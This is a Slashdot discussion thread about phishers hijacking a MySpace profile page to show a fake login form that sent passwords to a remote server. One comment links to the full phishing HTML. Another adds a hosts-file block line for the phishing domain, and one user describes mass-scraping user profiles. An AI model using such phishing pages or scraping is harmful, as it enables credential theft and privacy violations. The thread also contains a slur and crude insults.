MySpace Accounts Compromised By Phishers

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.

Maybe I caused the slow discovery

[AVryhof]

Maybe it's been my fault it's taken so long to "discover"

I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.

Re:Maybe I caused the slow discovery

Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.

Re:Maybe I caused the slow discovery

[Packt]

"Dear diary... mood? Apathetic."

They need to get that fixed ASAP

[Average_Joe_Sixpack]

Widespread exploitation of myspace could cause up to $6 dollars in damages

Re:They need to get that fixed ASAP

[wiz31337]

How could someone mistake comedy gold for a troll?!

Re:People won't change!

RTFA!

Phishing is everyware.

[Soltys]

Phishing is everyware: on eBay, Paypal, Citibank online. It's not good. When Phishing ware ended? When i do not need delete mass of Spam, probably never.

Re:Phishing is everyware.

[definate]

You sir, are a literary genius!

Finally

[1310nm]

Keep up the good work, phishers!

The secrets of apathetic teens will soon be aired for the world to view!

Re:Finally

Actually most of the phished accounts are just used to send out advertising bulletins. There are already enough compromised accounts... they don't care to screw with the account, they just post their bulletins over and over again. Not that it's a big secret, but a VERY large majority of Myspace users are total morons. Especially when it comes to any sort of online security or common sense.

Re:People won't change!

[drpimp]

No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!

You can view the horrible phishing status for free

OpenDNS people started http://phishtank.com/ service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps to people using that free list.

Netcraft confirms

[Aexia]

MySpace is dying

Re:Netcraft confirms

[zlogic]

This is a joke,not flamebait - TFA is hosted on Netcraft.

Re:Netcraft confirms

>MySpace is dying

must be from too many emo's 'cutting' themselfs...

Not quite.

"Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

http://www.comscore.com/press/release.asp?press=10 19

Re:Not quite.

[Fred_A]

Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.

So it's TheirSpace now ?

Re:Not quite.

[1310nm]

Guess I should have just called them "narcissists" instead of "apathetic teens".

Re:Not quite.

[5of0]

But how many of these over-35ers are actually over 35? And how many are over 100? Is there any accountability check as to the ages? Looking at their article, they're counting unique visitors - did they pop up a little box that said "Hey, how old are you?" A very important part is that it says "MySpace Visitors" - not users. So not users, but parents checking up on their little users, or pedophiles looking for their next victim. This just means Xanga is less browsed by those types. Anyone else see this?

So Much for IE7's Anti-Phishing

[mpapet]

As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.

Re:So Much for IE7's Anti-Phishing

[d3ik]

If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.

Re:So Much for IE7's Anti-Phishing

He said today myspace TOMORROW web 2.0. Learn to read you FAG!!!

- Wolf Bearclaw

Re:So Much for IE7's Anti-Phishing

[John+Hasler]

> MySpace may be great for 'social networking', but from a technical point of
> view it's a nightmare. Malformed HTML, non-degradable Javascript, code
> injection issues...

In other words, Web 2.0.

Re:So Much for IE7's Anti-Phishing

[thePowerOfGrayskull]

Another enlightened Myspace user...

It's dead...

[corychristison]

http://www.myspace.com/login_home_index_html

Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

Next!?

Re:It's dead...

Seems Myspace has fixed it.

No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

Expect to see a large number of variations on this to show up in the next few days/weeks.

NOT on Myspace's MAIN PAGE

[kihjin]

FTA:

The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.

Re:NOT on Myspace's MAIN PAGE

From the Myspace Security Bulletin

5.ALWAYS LOOK at the address bar when asked to login...
MAKE SURE that it is a MYSPACE.COM address.
FOR EXAMPLE:
http://login.myspace.com/index.cfm?fuseaction=logi n
----------------------
avoid things like
http://login.iwantyourpassword.com/index.cfm?fusea ction=login

The most important part is of course that the address had "myspace.com" in it

If you ever doubt the login pages...start over back at myspace.com

Heh, it passed the important part.

Confused on why this is phishing and not just your basic hacked server. I mean this sounds like someone inserted there own code a myspace protected server.

Re:NOT on Myspace's MAIN PAGE

[Extide]

Maybe you didnt notice the URL the spoof is at http://www.myspace.com/login_home_index_html

Re:NOT on Myspace's MAIN PAGE

[kihjin]

Yes, I noticed that.

I also noticed that the summary doesn't make any mention of it being a profile page. The article itself doesn't tell you it's a profile page until much further down. Seems like this would be the first thing to point out.

Based on the summary, I got the impression that you would be presented with the false login form if you went to http://www.myspace.com/

Re:NOT on Myspace's MAIN PAGE

[m3000]

This makes far more sense now. I also thought it was implying the server was hacked and phishers put up a fake login on the main page.

So while still a serious problem, it won't affect near as many people.

Re:NOT on Myspace's MAIN PAGE

[Sillygates]

Phising wouldn't be necessary if myspace moved to the open Wikimedia format

Re:I'm in love with Osaka

Jep, the testosterone is definitely tumbling....

M.E.H.

it is convincing and even security-conscious users are at risk of becoming victims.

Security conscious people use MySpace? Wh knew...

Re:M.E.H.

[4D6963]

Security conscious people use MySpace? Who knew...

There's even a Slashdot group on it actually. And as security concious as I am, I didn't see what was wrong with the two first example screenshots on Tom's blog about phishing, I think that if I went through one of these fake login-page profiles I might have fell for it, just because I don't expect to get phishing from a page on the genuine site itselves. Lots of people in my MySpace friends fell for it, and almost half of the bulletins in my bulletins list is the direct consequence of that.

As I commented on Tom's blog post, they have a big security issue for technically allowing phishing (among others, I suppose) happen on their own site. IMHO they're giving users a too great HTML/CSS freedom.

Re:M.E.H.

[doormat]

Indeed, but the whole use of HTML/CSS is what draws a lot of kids (and some adults) to the site is to make it really their space. The numerous myspace profile HTML/CSS generators out there make it point and click for the regular user.

I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users profiles. That would keep this from happening again, but might break some really custom (not even recognisable) myspace pages.

Number of compromised accounts

[otisg]

With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
1) the total number of "phished" accounts
2) the number of "phished" accounts in terms of a percentage of the total userbase.

Re:Number of compromised accounts

[arthurpaliden]

Possible not many since less than one third of all my space accounts are active.

Re:Number of compromised accounts

[otisg]

Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.

Re:Number of compromised accounts

[Siroro]

I used to host a free web hosting service. And as you can imagine it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account, it was only on-line for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked or not I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.

Re:Number of compromised accounts

[arthurpaliden]

Using a sample size of 14 Million accounts only about 4 Million were accessed within 14 days of the page being sampled and contained more that the default information. Of those the vast majority were access within 3 days of the sample date. This rate remains fairly constant throughtout the the user space starting with the first users.

Re:Number of compromised accounts

[otisg]

This is an experiment you performed on your own?

Re:Number of compromised accounts

[arthurpaliden]

Yes. I did it originally to see the age distribution of the users to see if it really was populated by teenagers who identify themselves as 12-15 year old girls and therefore be an easy hunting ground for the dreaded pedophiles. Well this is what I found:

MySpace Age Ranges By Gender As Indicated By Users
Age Range % Male % Female % Total

12 to 15 0.0007 0.0012 0.0019
16 to 18 9.25 12.39 21.64
19 to 21 11.64 12.29 23.93
22 to 35 22.90 18.00 40.90
36 to 55 3.48 2.66 6.14
56 to 99 1.58* 1.53* 3.11

Totals 48.85 46.87 95.72**

Based on sample size of about 4 million active users.
An active user visits their page at least once every 2 weeks.
Only about 1/3 of all MySpace users are active.

* Most likely users in the lower age groups lying.
        A further analysis of their page data would determine
        a truer age for each user.
** The balance did not give any age or are a Band (age 100).

I have gathered more information than just ages from each page and will be using the data to write a paper/article on the subject.

someone should tell the phishers

[kbox]

MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

Re:someone should tell the phishers

[otisg]

You clearly didn't read the Washington Post article.

The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays on the site even for a very amount of time, they will be able to grab a solid number of usernames. If they did that on Simpy for example, a site with nowhere that many daily active users, the catch would be a lot smaller. That's why phishers targeted MySpace.

Re:someone should tell the phishers

Why do they need to hijack myspace accounts to send viruses and keyloggers, though?

Re:someone should tell the phishers

[kingjames128]

People often have the same password for email accounts, bank accounts, Paypal, Ebay, etc. A user's Myspace also displays DOB and other info that maybe useful to a stranger who wants use the "Forgot my password" feature available on many websites. However, many users' DOBs are already displayed if their accounts are public.

Re:someone should tell the phishers

[theLOUDroom]

MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

People login to myspace with an email address and password.

If a person used the same password for their email, then not only is their email comprimised, but via their email, the attacker gets a list of other potential sites to try.

I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run around clicking on all those "I lost my password" links and you'll be able to respond to all those emails.

Re:someone should tell the phishers

[4D6963]

MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you get the same thing in your mail inbox.

So it should really be called "spam through phishing", and it's much more efficient than traditional spam because it uses a better, more "intimate" way to convince you to do what they want you to do.

Re:someone should tell the phishers

[Fred_A]

The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

Ah yes but mom and dad would do so with a different account and password and home directory, right ?
Huh ? Right ?

Guys ?

Re:someone should tell the phishers

[prodangle]

According to Tom (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.

Re:someone should tell the phishers

[InsertCleverUsername]

Yeah... I certainly had to read the Post article. My first thought on the story was "Phish a MySpace account?!? That's like an elaborate plot to steal manure!"

Re:someone should tell the phishers

[phillymjs]

Because they could edit MySpace pages to include code that does silent, drive-by malware installs on the machine of anyone that pulls up that page on an ill-maintained Windows box. Those machines would get pwned and could then have keyloggers installed on them to gather more useful info, or could be used to send spam, perform DoS attacks, etc.

Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, well-established friend networks.

~Philly

This one got me...

[billyjoeray]

I clicked a myspace profile link in a friends bulletin which sent me to what I thought was the login page (I failed to check that hostname was indeed login.myspace.com) The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was able to change my password and I haven't had any problems since then.

Re:This one got me...

boo hoo. my account got phished.
fuck off emo

Re:This one got me...

[SheeEttin]

What's even funnier is when you make an example phishing site and clearly mark it as phishing... and people still enter their information.

True story... and I posted it on a forum wher you don't want to click any links.

(Captcha: mourning... I am, indeed, for today's security.)

MySpace is dead!!!

[Deadguy2322]

Netcraft confirms it!

Using the same username/password everywhere

[GayBliss]

Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.

Re:Using the same username/password everywhere

More likely they will just add any previously undetected passwords to their dictionary file. Then they can use it for anything.

Phishing + SSL

[TheUni]

It's not these little phishing sites that scare me, it's the banking\credit union sites. For example, http://www.wamucards.com/ (DON'T ENTER YOUR INFO HERE!).

How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 In cases like these, i guess it makes sense

Re:Phishing + SSL

[baadger]

How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 In cases like these, i guess it makes sense

When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

Besides, Verisign only guarantee that their private signing keys are secure and therefore noone could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rats arse about what data retention or security is like on the other end. In fact refusing to issue MySpace a SSL certificate on the grounds their server side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.

Re:Phishing + SSL

I just checked with Washington Mutual, that is NOT, repeat NOT a phish. www.wamucards.com is a site owned and operated by Washington Mutual for their credit card account holders. Where did you obtain the information that this was a phish?

Re:Phishing + SSL

[LO0G]

I'm confused. Here's the domain registration for wamucards.com:
Registrant:
        Washington Mutual, Inc. (DOM-1398425)
        1201 3rd Ave Seattle WA 98101 US

        Domain Name: wamucards.com

        Registrar Name: Markmonitor.com
        Registrar Whois: whois.markmonitor.com
        Registrar Homepage: http://www.markmonitor.com/

        Administrative Contact:
        Administrative Contact (NIC-14324742) iFolio, Inc.
        1201 3rd Ave, 40th Floor Seattle WA 98101 US
        domains@ifolioinc.com +1.2063596677 Fax- -
        Technical Contact, Zone Contact:
        Technical Contact (NIC-14324922) iFolio, Inc.
        1201 3rd Ave, 40th Floor Seattle WA 98101 US
        domains@ifolioinc.com +1.2063596677 Fax- -

        Created on..............: 2005-Aug-01.
        Expires on..............: 2007-Aug-01.
        Record last updated on..: 2006-May-17 11:10:55.

        Domain servers in listed order:

        MIA01.DIGEX.COM
        MIA02.DIGEX.COM

Why do you believe it's a phishing site or otherwise fraudulent?

First off...

[rivetgeek]

This is really old news. Phishers have been around myspace for ever. They used to use embedded flash with action script to redirect and myspace upgraded to flash 9 which allows the server to restrict flash redirects ( a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.

This wouldn't have happened

[Rik+Sweeney]

if people had just installed Firefox 2

Re:This wouldn't have happened

Firefox 2 doesn't flag the page as being a phishing site. IE 7 does, though.

nothing new...

[r0ni]

My girlfriends account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, a attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

The destruction of myspace would probably be the best thing ever.

Re:nothing new...

[greese1]

What did she cheat on you over myspace?

Re:nothing new...

[r0ni]

No, but I fear that if I have to keep helping her fix her profile and she keeps telling me about this persons comment, that video, that mp3, yada, yada, yada... I might go crazy.

Taken Down?

[DavidD_CA]

I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

Either that, or, that's what these scammers want us to think?

the YTMND irc channel is full of myspace phishers

[kungfujesus]

i remember when i was on the YTMND irc channel and some guy posted a link to a text file with 3k myspace logins. good times

How is MySpace leaving the hack up legal?

[Zen]

So, how long was this active, does anybody know? The netcraft article is from the 27th, and today is the 29th. I believe it's down now, but how long has it been down since Netcraft notified myspace about it? It seems very trivial for myspace web admins to verify that the code includes the specific suspect URL and to take immediate action against it. In my industry (healthcare insurance), if any leak of information or incorrect data is suspected, the websites in question are immediately taken down until we can verify if there was or was not a problem, and get it fixed before bringing the sites back up if there was a problem. This is basically dictated by law for the insurance industry (various HIPPA, PHI, etc laws exist surrounding access to data). Not that there is actually a law against myspace leaving a hacked link active - I'm sure there isn't. But is there any reason why they would leave the profile section active while they investigated and fixed their code? The simple reason that their site is so popular and millions of people use it and would be pissed if it was offline for a period of time is the very reason why they should take it down and fix it before it affects their users - they don't want to alienate or piss them off, and they don't want their users to be able to prove that damage done to their credit was the direct result of inaction on the part of myspace's web admins, thereby opening up possible class action suits.

But Why

[kahrytan]

Those who maybe wondering why Phishers used Myspace.

1. It is a good way to get information about the user
2. Good way to get information about the user's friends.
3. How many pc illiterate often use same password for multiple accounts?

I have already added the following line to my hosts files:

216.178.32.51 greentea420.iespanna.es

Re:But Why

For those of you interested, this post contains the full CSS/HTML to do it:
http://www.zeroforce.net/forum/index.php?act=ST&f= 27&t=183&st=0#entry740

You're thinking of Livejournal..

[Channard]

.. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.

Re:You're thinking of Livejournal..

[RobertLTux]

besides if you really wanted to do this right you would have

1 a real like paid domain ------- got that myself
2 a real like paid hosting agreement ----- i use imagelinkusa.net myself
3 some actual html skills (or some sanish tools)
if you want to use some crawling horror like Myspace setup some sort of Zen profile and LINK YOUR DOMAIN

(funny thing is mySpace is blocked by at least one company)

Re:You're thinking of Livejournal..

[BoomerSooner]

Why did you have faith in humanity in the first place?\

Just curious...

So ... why is this a bad thing?

[Ravear]

Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

War is fun when you hate both sides.

How long was it active?

[SkiifGeek]

When we first came across this information a few days ago, it was also linked to Mashable.com, which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

Filtering based on blacklists (as you are suggesting MySpace admins do) doesn't always work. In this case, the URL that Netcraft discovered is only one of many being used to perpetrate the attack - as soon as one gets blacklisted, another will pop up. As to why it was left up for so long after discovery and notification? I guess people and companies just don't care as much about their security as they should.

If you want to see what we picked up on, you can always look here, or in my /. Journal.

What did you expect?

[pandrijeczko]

(Generally young) people with no desire to gain any technical understand of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements at the same people in a way that makes them feel like "one of the pack" whilst divesting the site owners of any responsibility of that personal data by offering the service as "free".

idiots fall for otherwise transparent con

[jgercken]

honestly, is this news?

I'm not surprised

[Krojack]

This just adds to the reasons why I'm glad I stopped using this service. I deleted my account on here a few months ago. I was getting sick of the fake spam/scam accounts wanting to invite me to be their "friend". Yeah I know setting my profile to non public would stop this but then it defeats the the whole part of having friends being able to find you.

Also the MySpace site is general is kinda clunky.. Looks like some high school kids project thats still learning HTML. Another words it look like crap. IMHO!

Why?

is this news? OMG! Those teens are now going to be exploited. Psh, who cares....